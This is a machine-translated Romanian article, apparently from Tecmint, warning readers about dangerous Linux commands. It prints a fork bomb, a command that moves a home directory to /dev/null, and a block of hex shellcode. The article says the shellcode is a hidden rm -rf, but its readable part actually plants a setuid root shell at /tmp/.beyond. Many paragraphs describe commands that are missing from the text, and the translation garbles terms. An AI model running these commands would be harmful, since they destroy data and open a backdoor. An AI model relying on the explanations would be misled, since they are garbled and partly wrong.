![Modul în care infractorii cibernetici folosesc programele publicitare pentru a face milioane](/f/6d347c4e02683c1d97ec9588bd5d3945.jpg?width=100&height=100)
Linia de comandă Linux este productivă, utilă și interesantă, dar uneori poate fi foarte periculoasă mai ales atunci când nu sunteți sigur ce faceți. Acest articol nu este destinat să te înfurie Linux sau Linia de comandă Linux. Vrem doar să vă conștientizăm câteva dintre comenzile la care ar trebui să vă gândiți de două ori înainte de a le executa.
rm -rf comanda este una dintre cele mai rapide modalități de a șterge un folder și conținutul acestuia. Dar o mică greșeală de eroare sau ignoranță poate duce la daune nerecuperabile ale sistemului. Unele dintre opțiunile utilizate cu rm comanda sunt.
Prin urmare, fiți atenți când executați rm -rf comanda. Pentru a depăși ștergerea accidentală a fișierului prin „rm„Comandă, creează un alias de„rm'Comanda ca'rm -i‘În„.bashrc”, Vă va cere să confirmați fiecare ștergere.
Cele de mai sus sunt de fapt un furcă bombă. Funcționează definind o funcție numită „:‘, Care se numește de două ori, o dată în prim-plan și o dată în fundal. Se continuă să se execute din nou și din nou până când sistemul îngheață.
:(){:|:&};:
Comanda de mai sus scrie rezultatul „comanda‘Pe bloc /dev/sda. Comanda de mai sus scrie date brute și toate fișierele de pe bloc vor fi înlocuite cu date brute, rezultând astfel pierderea totală a datelor de pe bloc.
Comanda de mai sus va muta „pliant' la /dev/null. În Linux /dev/null sau nul dispozitivul este un fișier special care elimină toate datele scrise pe acesta și raportează că operația de scriere reușește.
# mv / home / user / * / dev / null
Comanda de mai sus va muta tot conținutul unui Utilizator director către /dev/null, ceea ce înseamnă literalmente tot ce a fost trimis acolo gaură neagră (nul).
Comanda de mai sus va descărca un script dintr-o sursă rău intenționată și apoi îl va executa. Comanda Wget va descărca scriptul și SH va executa scriptul descărcat.
Notă: Ar trebui să fiți foarte conștienți de sursa de unde descărcați pachete și scripturi. Folosiți numai acele scripturi / aplicații care sunt descărcate dintr-o sursă de încredere.
Comanda de mai sus va formata blocul „sda ’ și cu siguranță știați că după executarea comenzii de mai sus Blocul dvs. (Unitate hard disk) ar fi nou, NOUĂ! Fără date, lăsând sistemul într-o etapă nerecuperabilă.
Comanda de mai sus este utilizată pentru a spăla conținutul fișierului. Dacă comanda de mai sus este executată cu o greșeală de eroare sau ignoranță de genul „> xt.conf ” va scrie fișierul de configurare sau orice alt sistem sau fișier de configurare.
Această comandă, așa cum este descrisă în documentul nostru 10 comenzi Linux mai puțin cunoscute, este utilizat pentru a edita comanda de rulare anterioară fără a fi nevoie să retipezi din nou întreaga comandă. Dar acest lucru poate fi cu adevărat deranjant dacă nu ați riscat să verificați cu atenție modificarea comenzii inițiale folosind ^ foo ^ bar comanda.
Comanda de mai sus va șterge blocul sda și scrieți date aleatorii nedorite în bloc. Desigur! Sistemul dvs. ar fi lăsat într-un stadiu incoerent și nerecuperabil.
Comanda de mai jos nu este altceva decât prima comandă de mai sus (rm -rf). Aici sunt ascunse codurile hex astfel încât un utilizator ignorant să fie păcălit. Rularea codului de mai jos în terminalul dvs. vă va șterge rădăcină partiție.
Această comandă arată că amenințarea poate fi ascunsă și uneori nu poate fi detectată în mod normal. Trebuie să fii conștient de ceea ce faci și care ar fi rezultatul. Nu compilați / rulați coduri dintr-o sursă necunoscută.
char esp [] __attribute__ ((secțiunea („. text”))) / * e.s.p. lansare * / = "\ Xeb \ x3e \ x5b \ x31 \ xc0 \ x50 \ x54 \ x5a \ x83 \ xec \ x64 \ x68" „\ Xff \ xff \ xff \ xff \ x68 \ xdf \ xd0 \ xdf \ xd9 \ x68 \ x8d \ x99 ″ „\ Xdf \ x81 \ x68 \ x8d \ x92 \ xdf \ xd2 \ x54 \ x5e \ xf7 \ x16 \ xf7 ″ „\ X56 \ x04 \ xf7 \ x56 \ x08 \ xf7 \ x56 \ x0c \ x83 \ xc4 \ x74 \ x56 ″ „\ X8d \ x73 \ x08 \ x56 \ x53 \ x54 \ x59 \ xb0 \ x0b \ xcd \ x80 \ x31 ″ „\ Xc0 \ x40 \ xeb \ xf9 \ xe8 \ xbd \ xff \ xff \ xff \ x2f \ x62 \ x69 ″ „\ X6e \ x2f \ x73 \ x68 \ x00 \ x2d \ x63 \ x00 ″ „Cp -p / bin / sh /tmp/.beyond; chmod 4755. /tmp/.beyond;”;
Notă: Nu executați niciuna dintre comenzile de mai sus în Linux terminal sau shell sau al computerului prietenului sau al școlii. Dacă doriți să le testați, rulați-le în mașină virtuală. Orice incoerență sau pierdere de date, datorită executării comenzii de mai sus, vă va defecta sistemul, pentru care nici Autor a articolului nici Tecmint este responsabil.
Asta este tot pentru acum. În curând voi fi din nou aici cu un alt articol interesant pe care oamenii îl vor încânta să citească. Până atunci rămâneți la curent și conectați-vă Tecmint. Dacă mai cunoașteți altele Comenzi Linux periculoase și doriți ca noi să adăugăm la listă, vă rugăm să ne spuneți prin secțiunea de comentarii și nu uitați să vă oferiți feedback valoros.